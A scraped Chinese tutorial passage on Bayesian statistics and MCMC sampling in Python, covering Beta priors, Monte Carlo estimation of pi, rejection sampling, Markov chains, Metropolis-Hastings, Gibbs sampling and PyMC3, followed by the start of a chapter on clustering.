    trials = [20, 20, 20, 20]
    data = [0, 5, 10, 20]
    beta_params = [(1, 1)]
    dist = stats.beta # dist 设为 Beta 分布
    x = np.linspace(0, 1, 100)
    # enumerate() 函数用于将一个可遍历的数据对象(如列表、元组或字符串)组合为一个索引序列,
    # 同时列出数据和数据下标,一般用在 for 循环当中。
    for idx, N in enumerate(trials):
    if idx == 0:
    plt.subplot(2, 2, 1)
    else:
    plt.subplot(2, 2, idx + 1)
    y = data[idx]
    for (a_prior, b_prior), c in zip(beta_params, ('b')):
    # 后验概率
    p_theta_given_y = dist.pdf(x, a_prior + y, b_prior + N - y)
    plt.plot(x, p_theta_given_y, c)
    plt.fill_between(x, 0, p_theta_given_y, color=c, alpha=0.6)
    # 先验概率
    plt.plot(x, stats.beta.pdf(x, 1, 1), color='r', linestyle='--',
    linewidth=1, alpha=0.5)
    plt.plot(0, 0, label='{:d}次实验\n{:d}次正面'.format(N, y), alpha=0)
    plt.xlim(0, 1)
    plt.ylim(0, 12)
    plt.xlabel(r'参数$\theta$')
    plt.legend()
    plt.gca().axes.get_yaxis().set_visible(False)
    plt.tight_layout()
    plt.show()

    png

    例 17.4

    同一商品在淘宝中发现了两个不同的商家:

    • 商家 A 有 10 条评论, 9 条好评和 1 条差评

    • 商家 B 有 500 条评论, 400 条好评和 100 条差评

    那么应该去选择哪家的商品?

    解: 先验分布选择$\mathrm{Beta}(1,1)$, 商家评论的样本数据服从二项分布, 二项分布的共轭先验分布为 Beta 分布, $a=1, b=1$,

    商家 A 试验次数$n=10$, 试验成功事件次数$x=9$, 因此商家 A 的后验分布为$\mathrm{Beta}(10, 2)$

    商家 B 的后验分布为$\mathrm{Beta}(401, 101)$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import matplotlib as mpl
    import matplotlib.pyplot as plt
    import scipy.stats as stats
    import numpy as np

    plt.rcParams['font.sans-serif'] = ['Microsoft YaHei']
    plt.rcParams['axes.unicode_minus'] = False

    x = np.linspace(0, 1, 100)
    plt.plot(x, stats.beta.pdf(x, 10, 2), color='b', linestyle='-', linewidth=2)
    plt.plot(x, stats.beta.pdf(x, 401, 101), color='g', linestyle='-.', linewidth=2)
    plt.legend((u'A 商家', u'B 商家'), loc='best')
    plt.show()

    png

    Beta 分布可以看作是一个概率的概率分布, 可以看出商家 A的好评概率均值更高, 但是方差更大

    $\mathrm{Beta}(\alpha, \beta)$的均值$E(X)$:

    $$E(X)=\frac{\alpha}{\alpha + \beta}$$

    方差$D(X)$:

    $$D(X)=\frac{\alpha\beta}{(\alpha+\beta)^2(\alpha + \beta + 1)}$$

    高斯-高斯共轭

    17.2 MCMC (马尔科夫链蒙特卡罗) 概述

    贝叶斯公式简洁直观, 更符合我们对事物的认知.

    在贝叶斯分析中, 我们常常需要计算后验分布的期望, 方差等数字特征, 如果先验分布不是共轭先验分布, 那么后验分布往往不再是标准的分布, 这时后验分布计算涉及很复杂的积分, 这个积分在大部分情况下是不可能进行精确计算的

    基于马尔科夫理论, 使用蒙特卡罗模拟方法回避后验分布表达式的复杂计算, 创造性地使用MCMC方法, 直接对后验分布的独立随机样本进行模拟, 再通过分析模拟样本获得均值等相关统计量.

    17.2.1 蒙特卡罗方法

    刘建平 Pinard-MCMC(一)蒙特卡罗方法

    尽管很多问题都难以求解甚至无法用公式准确表达, 但我们可以通过采样来近似模拟, 这就是蒙特卡洛算法的基本思想.

    $X$表示随机变量, 服从概率分布$p(x)$, 那么计算$p(x)$的期望时, 只要我们的抽样次数足够多, 就能够非常接近真实值

    例 17.5 随机模拟计算圆周率

    随机模拟计算圆周率$\pi$, 在一个边长为 1 的正方形中画一个内切圆, 在正方形内产生大量随机数, 只需要计算落在圆内点的个数和正方形内的点的个数比, 便近似得到了圆周率$\pi$的值

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import matplotlib.pyplot as plt
    import numpy as np

    N = 10000
    x, y = np.random.uniform(-1, 1, size=(2, N)) # 均匀分布, 在-1 ~ 1 的正方形内投 10000 个点
    inside = (x ** 2 + y ** 2) <= 1 # 圆圈内
    pi = inside.sum() * 4 / N # 估算的 pi
    error = abs((pi - np.pi) / pi) * 100 # 错误率%
    outside = np.invert(inside) # 按位取反
    plt.plot(x[inside], y[inside], 'b.')
    plt.plot(x[outside], y[outside], 'r.')
    plt.plot(0, 0, label='$\hat \pi$ = {:4.3f}\nerror = {:4.3f}%'.format(pi, error), alpha=0)
    plt.axis('square')
    plt.legend(frameon=True, framealpha=0.9, fontsize=16)
    plt.show()

    png

    在贝叶斯方法中可以利用蒙特卡罗方法对数据进行随机采样, 从而避开后验分布的计算(以频率估算概率)

    但如果 X 的概率分布不是常见的分布, 这就意味着我们无法直接得到这些非常见的概率分布的样本集

    为了弥补直接抽样法的不足, 冯诺依曼提出取舍抽样法

    取舍抽样法采用的是一种迂回的策略. 既然$p(x)$太复杂, 在程序中没法直接采样, 那么就选取一个容易采样的参考分布$q(x)$, 并且满足$p(x)\le Mq(x)$, 然后按照一定的策略拒绝某些样本, 剩下的样本就是来自所求分布$p(x)$

    拒绝采样(reject sampling)原理详解

    例 17.6 利用取舍抽样算法, 产生标准正态分布的随机样本

    解:取[-4, 4]上的均匀分布密度函数为参考分布$q(x)$, 常量$M=3.5$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    import numpy as np
    import matplotlib.pyplot as plt
    import math


    def p(x):
    """标准正态分布"""
    mu = 0
    sigma = 1
    return 1 / (math.pi * 2) ** 0.5 / sigma * np.exp(-(x - mu) ** 2 / 2 / sigma ** 2)


    def q(x):
    """参考分布选用[-4, 4]上的均匀分布"""
    return np.array([0.125 for i in range(len(x))])


    x = np.linspace(-4, 4, 500)
    M = 3.5
    N = 1000 # 样本个数
    """
    Set 采样数目 i = 1
    Repeat until i = N
    (1) 从参考分布 q(x)采样得到样本 x
    (2) 从均匀分布[0, 1]采样得到μ
    (3) 如果μ ≤ p(x) / (Mq(x)), 那么接受 x, i 自增 1, 否则舍弃 x
    可以证明接受的数据样本集 X 服从概率分布 p(x)
    """
    i = 1
    count = 0
    samples = np.array([])
    while i < N:
    u = np.random.rand(10) # 每次评估 10 个样本, 服从均匀分布 U(-1, 1)
    x = (np.random.rand(10) - 0.5) * 8 # 产生[-4, 4]的样本
    res = u < (p(x) / (q(x) * M))
    if any(res): # 接受满足条件的样本, 否则舍弃
    samples = np.hstack((samples, x[res]))
    i += len(x[res])
    count += 10
    count -= len(samples) - 1000
    samples = samples[:1000] # (只取前 1000 个? 我不明白这句话有什么用)
    x = np.linspace(-4, 4, 500)
    plt.plot(x, p(x))
    plt.hist(samples, 100, density=True, facecolor='blue')
    plt.title('Rejection Sampling', fontsize=24)
    plt.xlabel('x', fontsize=14)
    plt.ylabel('p(x)', fontsize=14)
    plt.show()
    print(N / count)

    png

    0.2864508736751647

    17.2.2 马尔科夫链 (Markov Chain)

    马尔科夫链(简称马氏链)定义比较简单, 它假设某一时刻状态转移的概率依赖于前一个状态

    马氏链核心三要素: 1. 状态空间 2. 无记忆性 3. 转移矩阵

    刘建平 Pinard-MCMC(二)马尔科夫链

    【数之道 18】"马尔可夫链"是什么?了解它只需 5 分钟!

    例 17.7

    一家连锁汽车租赁公司有 3 处门店, 租车和还车都可以选择任何一个门店, 从不同门店借出和归还车的概率如下表

    借还车概率分布1 号店2 号店3 号店
    1 号店0.50.30.3
    2 号店0.20.10.6
    3 号店0.30.60.1

    如从 1 号店借出 2 号店归还的概率是 0.15(书上是这么写, 我认为是 0.3), 请问一辆车从 2 号门店借出, 公司前 3 次应该从哪家店找最快捷?

    解:不同门店借出和归还的概率可以用一个转换矩阵p来表示

    $$
    \mathbf{P}=\begin{bmatrix}
    0.5 & 0.3 & 0.3 \
    0.5 & 0.1 & 0.6 \
    0.3 & 0.6 & 0.1
    \end{bmatrix}
    $$

    该车初始状态的概率为$\pi_0\left[\pi_0(1),\pi_0(2),\pi_0(3)\right]$(从 2 号门店借出)

    第一次归还不同门店的概率$\pi_1=\pi_0\mathbf{P}$

    第二次归还不同门店的概率$\pi_2=\pi_1\mathbf{P}$

    依此类推, 第$n$次归还不同门店的概率$\pi_n=\pi_{n-1}\mathbf{P}$

    车在不同时间归还的门店分布概率$\pi_t$就形成了一个马氏链

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import numpy as np

    # 转移矩阵 matrix
    matrix = np.matrix([[0.5, 0.3, 0.3], [0.2, 0.1, 0.6], [0.3, 0.6, 0.1]])
    vector1 = np.matrix([[0, 1, 0]], dtype=float)
    for i in range(30):
    vector1 = vector1 * matrix # 下一个状态 = 上一个状态 * 转移矩阵
    print("Current round:", i + 1)
    print(vector1)
    Current round: 1[[0.2 0.1 0.6]]Current round: 2[[0.3  0.43 0.18]]Current round: 3[[0.29  0.241 0.366]]Current round: 4[[0.303  0.3307 0.2682]]Current round: 5[[0.2981  0.28489 0.31614]]Current round: 6[[0.30087  0.307603 0.291978]]Current round: 7[[0.299549  0.2962081 0.3040206]]Current round: 8[[0.3002223  0.30189787 0.29799162]]Current round: 9[[0.29988821 0.29905145 0.30100457]]Current round: 10[[0.30005577 0.30047435 0.29949779]]Current round: 11[[0.29997209 0.29976284 0.30025112]]Current round: 12[[0.30001395 0.30011858 0.29987444]]Current round: 13[[0.29999302 0.29994071 0.30006278]]Current round: 14[[0.30000349 0.30002965 0.29996861]]Current round: 15[[0.29999826 0.29998518 0.30001569]]Current round: 16[[0.30000087 0.30000741 0.29999215]]Current round: 17[[0.29999956 0.29999629 0.30000392]]Current round: 18[[0.30000022 0.30000185 0.29999804]]Current round: 19[[0.29999989 0.29999907 0.30000098]]Current round: 20[[0.30000005 0.30000046 0.29999951]]Current round: 21[[0.29999997 0.29999977 0.30000025]]Current round: 22[[0.30000001 0.30000012 0.29999988]]Current round: 23[[0.29999999 0.29999994 0.30000006]]Current round: 24[[0.3        0.30000003 0.29999997]]Current round: 25[[0.3        0.29999999 0.30000002]]Current round: 26[[0.3        0.30000001 0.29999999]]Current round: 27[[0.3 0.3 0.3]]Current round: 28[[0.3 0.3 0.3]]Current round: 29[[0.3 0.3 0.3]]Current round: 30[[0.3 0.3 0.3]]

    $\pi_1 = \left[0.2, 0.1, 0.6\right]$, 选择概率最大的, 因此第 1 次先从 3 号门店找

    $\pi_2 = \left[0.3, 0.43, 0.18\right]$, 因此第 2 次从 2 号门店找

    $\pi_3 = \left[0.29, 0.241, 0.366\right]$, 因此第 3 次从 3 号门店找

    17.3 MCMC 采样

    刘建平 Pinard-MCMC(三)MCMC 采样和 M-H 采样

    【数之道】马尔可夫链蒙特卡洛方法是什么?十五分钟理解这个数据科学难点

    MCMC 的采样: 设当前采样点为$x$, 下一个采样点是$x^*$

    定义 17.3 如果非周期马氏链的状态转移矩阵$q(x^*|x)$概率分布$p(x)$满足:

    $$\color{Blue}{p(x)}\color{Red}{q(x*|x)}=\color{Blue}{p(x)}\color{Red}{q(x|x^)}$$

    则称概率分布$\color{Blue}{p(x)}$是马氏链的平稳分布, 也被称为马氏链的细致平稳条件

    定义 17.4 但是一般情况下, 目标平稳状态分布和某一个马尔科夫链状态转移矩阵不满足细致平稳条件:

    $$\color{Blue}{p(x)}\color{Red}{q(x*|x)}\ne\color{Blue}{p(x)}\color{Red}{q(x|x^)}$$

    可以引入一个$\color{Green}{\alpha(x, x^*)}$, 使得:

    $$\color{Blue}{p(x)}\color{Red}{q(x^|x)}\color{Green}{\alpha(x, x*)}=\color{Blue}{p(x)}\color{Red}{q(x|x*)}\color{Green}{\alpha(x*, x)}$$

    其中$\color{Green}{\alpha(x*,x)}=\color{Blue}{p(x)}\color{Red}{q(x|x)}, \color{Green}{\alpha(x,x*)}=\color{Blue}{p(x)}\color{Red}{q(x|x^*)}$

    MCMC 算法:

    1. 输入任意给定的马尔科夫链状态转移矩阵$Q$, 目标平稳分布$\pi(x)$, 设定状态转移次数阈值$n_1$, 需要的样本数$n_2$

    2. 从任意简单概率分布得到初始状态值$x_0$

    3. for $t=0$ in $n_1 + n_2 - 1$:

      a. 从条件概率分布$Q(x|x_t)$得到样本值$x^*$

      b. 从均匀分布中采样$U\sim\left[0,1\right]$

      c. if $u<\alpha(x_t,x^) = \pi(x*)Q(x,x_t)$: 接受$x_t\to x^$, 即$x_{t+1}=x^$

      d. else: 不接受转移, $t=max{t-1, 0}$

    但在转移过程中的接受率$\alpha(x,x^*)$可能偏小, 造成采样过程中的马氏链收敛到平稳分布$p(x)$的速度太慢, 提出改进: M-H 算法

    M-H 算法

    1. 输入任意给定的马尔科夫链状态转移矩阵$Q$, 目标平稳分布$\pi(x)$, 设定状态转移次数阈值$n_1$, 需要的样本数$n_2$

    2. 从任意简单概率分布得到初始状态值$x_0$

    3. for $t=0$ in $n_1 + n_2 - 1$:

      a. 从条件概率分布$Q(x|x_t)$得到样本值$x^*$

      b. 从均匀分布中采样$U\sim\left[0,1\right]$

      c. if $u<\alpha(x_t,x^) = \pi(x*)Q(x,x_t)\color{Brown}{=min{\frac{\pi()Q(x^, x_t)}{\pi(t)Q(x_t, x^)},1}})$(将两数中最大的一个放大到 1): 接受$x_t\to x^$, 即$x_{t+1}=x^*$

      d. else: 不接受转移, $t=max{t-1, 0}$

    例 17.8 使用 M-H 算法实现对瑞利分布的采样

    瑞利分布的概率密度函数为:

    $$f(x)=\frac{x}{\sigma2}\exp{-\frac{x2}{2\sigma^2}}, x\ge 0, \sigma>0$$

    解:

    参考分布$q(i, j)$选取: $df=x_t$的卡方分布

    目标分布: 标准差为 4($\sigma=4$)的瑞利分布

    1 用 M-H 算法实现对瑞利分布的采样, 转移概率用自由度为$x_t$的卡方分布
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    import numpy as np
    import matplotlib.pyplot as plt
    import scipy.stats as stats
    import math


    def Rayleigh(x, sigma):
    """返回瑞利分布"""
    if x < 0:
    return 0
    elif sigma > 0:
    return ((x / sigma ** 2) * np.exp(-x ** 2 / (2 * sigma ** 2)))


    m = 10000
    sigma = 4
    x = [0.00 for i in range(m)] # 10000 个 0 的序列
    # 从卡方分布中获得初始状态
    x[1] = stats.chi2.rvs(df=1)
    k = 0
    for i in range(2, m):
    xt = x[i - 1]
    x_star = stats.chi2.rvs(df=math.ceil(xt))
    num = Rayleigh(x_star, sigma) * stats.chi2.pdf(xt, df=math.ceil(x_star))
    den = Rayleigh(xt, sigma) * stats.chi2.pdf(x_star, df=math.ceil(xt))
    u = np.random.uniform(0, 1) # 从均匀分布中生成随机数 u
    if u <= min(1, num / den):
    x[i] = x_star # 接受转移
    else:
    x[i] = xt
    k = k + 1
    print("被拒绝的样本数目: ", k)
    被拒绝的样本数目:  3408
    2 显示马氏链部分样本路径图、随机模拟样本的直方图
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    index = [number for number in range(5000, 5500)]
    y1 = x[5000:5500]
    fig1 = plt.figure(num='fig1', figsize=(10, 3))
    # 马氏链部分样本路径图
    plt.plot(index, y1)
    fig2 = plt.figure(num='fig2', figsize=(6, 3))
    b = 2001 # 去掉达到平稳状态之前的样本
    y = x[b:m]
    # 瑞利分布密度函数曲线图
    plt.scatter(y, [Rayleigh (i, 4) for i in y], color='red', linewidth=1)
    # 样本的直方图
    plt.hist(y, 25, density=True, facecolor='white', edgecolor='black', alpha=1)
    plt.show()

    png

    png

    17.4 Gibbs 采样

    浅谈「Gibbs 采样」

    An introduction to Gibbs sampling (Youtube)

    一种从二(多)维概率分布中进行采样的方法

    可以对平面上任意两点$A(x_A, y_A)$和$B(x_B, y_B)$构造如下的转移概率矩阵:

    $$\mathbf{p}(B|A)=\left{\begin{matrix}
    P(y_B|x_1),x_A=x_B=x_1 \
    P(x_B|y_1),y_A=y_B=y_1 \
    0, others
    \end{matrix}\right.$$

    根据上面构造的转移矩阵, 可得平面上的任意两点$A$和$B$满足细致平稳条件$\pi(A)P(B|A)=\pi(B)P(A|B)$, 马氏链将收敛到平稳分布$\pi(X)$

    如 A 和 B 的转移矩阵:

    B/A01
    00.10.4
    10.30.2

    转移概率矩阵$P(A|B)$:

    B/A01
    00.1 / (0.1 + 0.4) = 0.20.4 / (0.1 + 0.4) = 0.8
    10.3 / (0.3 + 0.2) = 0.60.2 / (0.3 + 0.2) = 0.4

    转移概率矩阵$P(B|A)$:

    B/A01
    00.1 / (0.1 + 0.3) = 0.250.4 / (0.1 + 0.3) = 2 / 3
    10.3 / (0.4 + 0.2) = 0.750.2 / (0.4 + 0.2) = 1 / 3

    二维情况的 Gibbs 采样算法描述如下:

    (1) 随机初始化状态$x_0$和$y_0$

    (2) 循环进行采样(当前采样点$t$)

    ①$y_{t+1}\sim p(y|x_t)$

    ②$x_{t+1}\sim p(x|y_{t+1})$

    例 17.9 利用 Gibbs 采样一个二维正态分布

    利用 Gibbs 采样一个二维正态分布$Norm(\mu, \Sigma)$, 其中均值$\mu_1=\mu_2=0$, 标准差$\sigma_1=8, \sigma_2=2$, 相关系数$\rho=0.5$, 状态转移概率分布为如下:

    $$P(x_1|x_2)=Norm\left[\frac{\mu_1+\rho\sigma_1}{\sigma_2(x_2-\mu_2), }, (1-\rho2)\sigma2_1\right]$$

    $$P(x_2|x_1)=Norm\left[\frac{\mu_2+\rho\sigma_2}{\sigma_1(x_1-\mu_1), }, (1-\rho2)\sigma2_2\right]$$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    import pylab as pl
    import numpy as np
    import math
    sigma_x = 8 # x 维度正态分布的标准差
    sigma_y = 2 # y 维度正态分布的标准差
    cov = 0.5 # x 和 y 的相关系数


    def pdf_gaussian_x(x):
    """x 维度的概率密度函数"""
    return (1 / (math.sqrt(2 * math.pi) * sigma_x)) * math.exp(-math.pow(x, 2) / (2 * math.pow(sigma_x, 2)))


    def pxgiveny(y):
    """条件分布 p(x|y)"""
    return np.random.normal(y * (sigma_x/sigma_y) * cov, sigma_x * math.sqrt(1 - cov * cov))


    def pygivenx(x):
    """条件分布 p(y|x)"""
    return np.random.normal(x * (sigma_y/sigma_x) * cov, sigma_y * math.sqrt(1 - cov * cov))


    def gibbs(N_hop):
    #随机初始化 x 和 y 状态
    x_states = []
    y_states = []
    x = np.random.uniform()
    y = np.random.uniform()
    for _ in range(N_hop):
    x = pxgiveny(y) #根据 y 采样 x
    y = pygivenx(x) #根据 x 采样 y
    x_states.append(x)
    y_states.append(y)
    return x_states[-1000:], y_states[-1000:]


    def plot_gibbs():
    #gibbs 采样
    x_sample, y_sample = gibbs(100000)
    fig1 = pl.figure(num='fig1', figsize=(10, 3), dpi=75, facecolor='#FFFFFF', edgecolor='#0000FF')
    x1 = np.arange(-30, 30, 1)
    #x 一维维度采样样本的直方图
    pl.hist(x_sample, density=True, bins=x1, histtype='step', label="Simulated_Gibbs")
    # plt.hist(x_res, num_bins, normed=1, facecolor='green', alpha=0.5)
    # plt.hist(y_res, num_bins, normed=1, facecolor='red', alpha=0.5)
    px1 = np.zeros(len(x1))
    for i in range(len(x1)):
    px1[i] = pdf_gaussian_x(x1[i])
    #密度函数曲线
    pl.plot(x1, px1, label="Real Distribution")
    pl.legend()
    fig2 = pl.figure(num='fig2', figsize=(10, 3), dpi=75, facecolor='#FFFFFF', edgecolor='#0000FF')
    #采样样本的散点图
    pl.scatter(x_sample,y_sample,alpha=.75, cmap='gray_r')
    pl.show()
    plot_gibbs()

    png

    png

    17.5 综合实例——利用 PyMC3 实现随机模拟样本分布

    17.5.1 随机模拟样本分布

    例 17.10

    8.7 节综合实例中利用最大似然估计数据分布参数$\mu$, 现改用贝叶斯统计方法, 利用 PyMC3 工具包对参数$\mu$的后验分布进行随机模拟采样

    $$\color{Red}{P(\mu|Data)}=\frac{\color{Blue}{P(Data|\mu)}\color{Green}{P(\mu)}}{\color{Purple}{P(Data)}}$$

    后验概率 = 似然 * 先验概率 / 边缘相似性

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    import matplotlib.pyplot as plt
    import numpy as np
    import pandas as pd
    import pymc3 as pm
    import scipy
    import scipy.stats as stats
    import scipy.optimize as opt
    import matplotlib.pyplot as plt


    def poisson_logprob(mu, sign=-1):
    return np.sum(sign * stats.poisson.logpmf(y_obs, mu=mu))


    # 读取数据文件
    messages = pd.read_csv('QQ_data.csv')
    with pm.Model() as model:
    # 创建一个概率模型
    mu = pm.Uniform('mu', lower=0, upper=60)
    likelihood = pm.Poisson('likelihood', mu=mu, observed=messages['numbers'].values)
    start = pm.find_MAP()
    step = pm.Metropolis()
    trace = pm.sample(20000, step, start=start, progressbar=True)
    y_obs = messages['numbers'].values
    # 极大似然估计求解 mu
    freq_results = opt.minimize_scalar(poisson_logprob)
    # traceplot 函数来绘制后验采样的趋势图
    pm.traceplot(trace, varnames=['mu'], lines={'mu': freq_results['x']})
    plt.show()
    100.00% [6/6 00:00<00:00 logp = -3,399, ||grad|| = 1,991]


    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_1832\3361505615.py:23: DeprecationWarning: Call to deprecated Parameter start. (renamed to `initvals` in PyMC v4.0.0) -- Deprecated since v3.11.5.  trace = pm.sample(20000, step, start=start, progressbar=True)C:\Users\gzjzx\anaconda3\lib\site-packages\deprecat\classic.py:215: FutureWarning: In v4.0, pm.sample will return an `arviz.InferenceData` object instead of a `MultiTrace` by default. You can pass return_inferencedata=True or return_inferencedata=False to be safe and silence this warning.  return wrapped_(*args_, **kwargs_)Multiprocess sampling (4 chains in 4 jobs)Metropolis: [mu]
    100.00% [84000/84000 14:52<00:00 Sampling 4 chains, 0 divergences]
    Sampling 4 chains for 1_000 tune and 20_000 draw iterations (4_000 + 80_000 draws total) took 911seconds.
    例 17.11 利用 PyMC3 工具包来判断硬币实验是否存在偏差
    1. 生成数据样本
    1
    2
    3
    4
    5
    6
    7
    8
    import numpy as np
    import scipy.stats as stats

    np.random.seed(1)
    n_experiments = 100 # 试验次数
    theta_real = 0.35 # 硬币正面向上的概率参数θ, 用 theta_real 来表示
    data = stats.bernoulli.rvs(p=theta_real, size=n_experiments)
    data
    array([0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1,       0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 0, 1,       0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0,       1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1,       1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0])
    1. 指定相应的贝叶斯模型
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import pymc3 as pm

    with pm.Model() as our_first_model: # 构建了一个模型的容器
    theta = pm.Beta('theta', alpha=1, beta=1) # 指定先验(Beta 分布, alpha=1, beta=1)
    #用跟先验相同的语法描述了似然概率,用 observed 参数传递了观测到的数据
    y= pm.Bernoulli('y', p=theta, observed=data)
    # 返回最大后验(Maximum a Posteriori,MAP),为采样方法提供一个初始点
    start=pm.find_MAP()
    # 采样方法 Metropolis-Hastings 算法,PyMC3 会根据不同参数的特性自动地赋予一个采样器
    step = pm.Metropolis()
    # 执行采样,其中第 1 个参数是采样次数,第 2 个和第 3 个参数分别是采样方法和初始点
    trace = pm.sample(1000, step=step, start=start)
    WARNING (theano.configdefaults): g++ not available, if using conda: `conda install m2w64-toolchain`WARNING (theano.configdefaults): g++ not detected ! Theano will be unable to execute optimized C-implementations (for both CPU and GPU) and will default to Python implementations. Performance will be severely degraded. To remove this warning, set Theano flags cxx to an empty string.WARNING (theano.tensor.blas): Using NumPy C-API based implementation for BLAS functions.
    100.00% [6/6 00:00<00:00 logp = -69.315, ||grad|| = 14]


    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_16548\2057679967.py:12: DeprecationWarning: Call to deprecated Parameter start. (renamed to `initvals` in PyMC v4.0.0) -- Deprecated since v3.11.5.  trace = pm.sample(1000, step=step, start=start)C:\Users\gzjzx\anaconda3\lib\site-packages\deprecat\classic.py:215: FutureWarning: In v4.0, pm.sample will return an `arviz.InferenceData` object instead of a `MultiTrace` by default. You can pass return_inferencedata=True or return_inferencedata=False to be safe and silence this warning.  return wrapped_(*args_, **kwargs_)Multiprocess sampling (4 chains in 4 jobs)Metropolis: [theta]

    17.5.2 模型诊断

    1. 样本路径图

    PyMC3 提供了 traceplot 函数来绘制后验采样的趋势图

    1
    2
    3
    burnin = 100
    chain = trace[burnin:]
    pm.traceplot(chain, lines={'theta': theta_real})
    2. Gelman-Rubin 检验
    1
    pm.gelman_rubin(chain)

    理想状态下 theta=1, 若 theta<1.1, 可以认为是收敛的

    3. summary 函数
    1
    pm.summary(chain)
    4. 自相关函数图
    1
    pm.autocorrplot(chain)
    5. 有效采样大小
    1
    pm.effective_n(chain)['theta']
    17.5.3 基于后验的模型决策
    1
    pm.plot_posterior(chain)
    1
    pm.plot_posterior(chain, kde_plot=True, rope=[0.45, 0.55])

    (摆烂)

    ]]>
    @@ -9915,7 +9915,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%8016/ - 正文

    16 聚类分析

    16.1 聚类分析概述

    16.1.2 距离和相似性

    1. 欧氏距离

    可以简单地描述为多维空间中点与点之间的几何距离.

    $$d(X,Y)=\left[\Sigman_{i=1}(X_i-Y_i)2\right]^{\frac{1}{2}}$$

    2. 曼哈顿距离

    计算从一个点到另一个点所经过的折线距离, 取消了欧氏距离中的平方操作, 使得一些离群点的影响会相对减弱

    $$d(X,Y)=\frac{1}{n}\Sigma^n_{i=1}|X_i-Y_i|$$

    3. 闵可夫斯基距离

    对于高维数据, 闵可夫斯基距离是一种更加流行的距离度量方法

    $$d_p(X, Y)=(\Sigman_{i=1}|X_i-Y_i|p)^{\frac{1}{p}}$$

    其中$p$是待选的指数, 如果$p=1$, 闵可夫斯基变为曼哈顿距离, 如果$p=2$, 闵可夫斯基距离变为欧氏距离

    4. 相关性及相关距离

    可以用皮尔森相关系数度量样本之间的相关性

    $$\rho_{XY}=\frac{COV(X,Y)}{\sqrt{DX}\sqrt{DY}}=\frac{\Sigma^n_{i=1}(X_i-\bar X)(Y_i-\bar Y)}{\sqrt{\Sigma^n_{i=1}(X_i-\bar X)2}\sqrt{\Sigman_{i=1}(Y_i-\bar Y)^2}}$$

    可以用$1-\rho_{XY}$表示相关距离, 当相关性增强时, 相关系数增加, 相关距离会减小, 趋向于 0

    16.1.3 聚类分析的类型

    聚类分析从不同的角度有多种分类方法

    • 基于聚类方法的嵌套性: 基于划分、基于层次

    • 基于聚类方法的准确性: 精确分类、模糊分类

    • 基于分类方法的完全性: 完全聚类、部分聚类

    • 基于簇的特性:

      • 基于原型的聚类: 原型一般指样本空间中一些具有代表性的点.也可以称为基于中心的聚类
      • 基于图的聚类: 以图论为基础, 将聚类问题转换为图的最优划分问题, 簇内的数据对象相互连接, 簇之间的对象没有连接
      • 基于密度的聚类: 利用点的密度作为聚类依据(以这个点为圆心, 以某个值作为半径构成的邻域内点的个数)

    16.2 层次聚类

    层次聚类法是将相近的有关联的点聚合成簇, 产生一个分层次的聚类树

    从聚类的特点上看, 一部分的层次聚类方法有图聚类的特性, 另一部分的层次聚类法有原型聚类的特性

    16.2.2 层次聚类流程

    1. 将每个数据点作为一个簇, 计算每个簇之间的距离矩阵
    2. 合并距离最近的两个簇

    簇之间的距离计算方法:

    • 最小距离, 将两个簇的数据点中距离最近的两个点之间的距离作为这两个簇之间的距离

    $$d(u,v)=min_{i, j}\left[dist(u\left[i\right],v\left[j\right])\right]$$

    • 最大距离, 最大距离的计算方法与最小距离相反, 将两个簇的数据点中距离最远的两个点之间的距离作为这两个簇之间的距离

    $$d(u,v)=max_{i, j}\left[dist(u\left[i\right],v\left[j\right])\right]$$

    • 平均距离, 计算两个簇中的每个数据点之间的距离, 然后将所有距离的均值作为两个簇之间的距离, 计算量较大但更加合理

    $$d(u,v)=\Sigma_{i,j}\frac{dist(u\left[i\right],v\left[j\right])}{(|u|*|v|)}$$

    16.2.3 层次聚类实例

    1. 层次聚类对种子特性数据的分析
    # 引入层次聚类函数, 树状图函数
    from scipy.cluster.hierarchy import linkage, dendrogram
    import matplotlib.pyplot as plt
    # 引入坐标轴显示控制库
    from matplotlib.ticker import MultipleLocator
    import pandas as pd

    %matplotlib inline
    seeds_df = pd.read_csv("seeds-less-rows.csv")
    seeds_df.head()
    area perimeter compactness length width asymmetry_coefficient groove_length grain_variety
    0 14.88 14.57 0.8811 5.554 3.333 1.018 4.956 Kama wheat
    1 14.69 14.49 0.8799 5.563 3.259 3.586 5.219 Kama wheat
    2 14.03 14.16 0.8796 5.438 3.201 1.717 5.001 Kama wheat
    3 13.99 13.83 0.9183 5.119 3.383 5.234 4.781 Kama wheat
